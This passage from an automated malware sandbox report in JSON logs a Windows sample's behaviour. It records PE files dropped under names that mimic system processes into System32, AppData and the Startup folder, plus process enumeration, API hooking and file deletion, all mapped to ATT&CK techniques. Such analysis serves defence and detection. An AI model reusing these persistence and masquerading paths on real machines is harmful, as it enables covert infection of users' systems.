4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46774 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46983 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46800 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46722 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46908 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46809 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46931 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46673 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46911 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46931 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46763 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46852 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46715 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46857 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46888 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46828 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 47000 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46966 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46925 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46806 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46862 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46851 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46796 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46963 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46782 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46797 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46794 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46822 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46741 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08.exe]- [targetUID: 00000000-00000952]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00000952]\n \"D3_08.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00000952]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00006008]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00000952]\n \"D3_08.EXE.67EE4BB1.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE4667.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00000952]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00000952]\n \"D3_08.EXE.67EE4665.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"MrD3_08.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\MrD3_08.scr]- [targetUID: 00000000-00000952]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00000952]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00000952]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00000952]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00000952]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\D3_08.exe]- [targetUID: 00000000-00000952]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00000952]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE4BB3.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00000952]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00000952]\n \"D3_08.EXE.67EE4D76.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00000952]\n \"IEXPLORER.EXE.67EE4D7B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00000952]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00000952]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FileTimeToLocalFileTime\" with parameter 30e5fef92b04ca01 & 30b587bd3c04ca01 (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FileTimeToLocalFileTime\" with parameter 9bd8b77161a4db01 & 9ba8403572a4db01 (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FileTimeToLocalFileTime\" with parameter 45b9f08961a4db01 & 4589794d72a4db01 (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FileTimeToLocalFileTime\" with parameter 31d75b8a61a4db01 & 31a7e44d72a4db01 (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FileTimeToLocalFileTime\" with parameter 47c6308c61a4db01 & 4796b94f72a4db01 (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FileTimeToLocalFileTime\" with parameter cf6c738c61a4db01 & cf3cfc4f72a4db01 (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FileTimeToLocalFileTime\" with parameter b25e928c61a4db01 & b22e1b5072a4db01 (UID: 00000000-00006008)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00006008)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "api-284", "type": 6, "relevance": 1, "name": "Opens a handle to the specified local process", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opens a process \"C:\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opens a process \"C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000041.db\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opens a process \"C:\\Windows\\System32\\taskhost.exe\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opens a process \"C:\\Windows\\System32\\dwm.exe\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opens a process \"C:\\Windows\\explorer.exe\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opens a process \"C:\\Windows\\System32\\conhost.exe\" (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opens a process \"C:\\Windows\\D3_08.exe\" (UID: 00000000-00006008)", "origin": "API Call", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "hooks-0", "type": 11, "relevance": 10, "name": "Hooks API calls", "description": "\"FindResourceA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"CreateRemoteThread@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"CopyFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"CopyFileW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"send@WS2_32.DLL\" in \"CSRSS.EXE\"\n \"CreateProcessW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"RemoveDirectoryA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"LoadResource@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"LoadLibraryA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"RemoveDirectoryW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"CreateProcessA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"CreateDirectoryA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"LoadLibraryExW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"Process32NextW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"OpenMutexW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"GetLogicalDriveStringsA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"WinExec@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindResourceW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"GetLogicalDriveStringsW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"CreateDirectoryW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"LoadLibraryW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"OpenMutexA@KERNEL32.DLL\" in \"CSRSS.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SMSS.EXE\" with delete access\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SMSS.EXE\" with delete access\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SMSS.EXE\" with delete access\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\CSRSS.EXE\" with delete access\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\CSRSS.EXE\" with delete access\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" with delete access\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" with delete access\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\WINLOGON.EXE\" with delete access\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINLOGON.EXE\" with delete access\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" with delete access\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SERVICES.EXE\" with delete access\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SERVICES.EXE\" with delete access\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SERVICES.EXE\" with delete access\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\LSASS.EXE\" with delete access\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\LSASS.EXE\" with delete access\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\LSASS.EXE\" with delete access\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\D3_08.EXE\" with delete access\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\D3_08.EXE\" with delete access\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\D3_08.EXE\" with delete access\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" marked \"C:\\share\\D3_08\\New Folder.exe\" for deletion\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" marked \"C:\\share\\Data %OSUSER%.exe\" for deletion\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" for deletion\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" for deletion\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\winlogon.exe\" for deletion\n 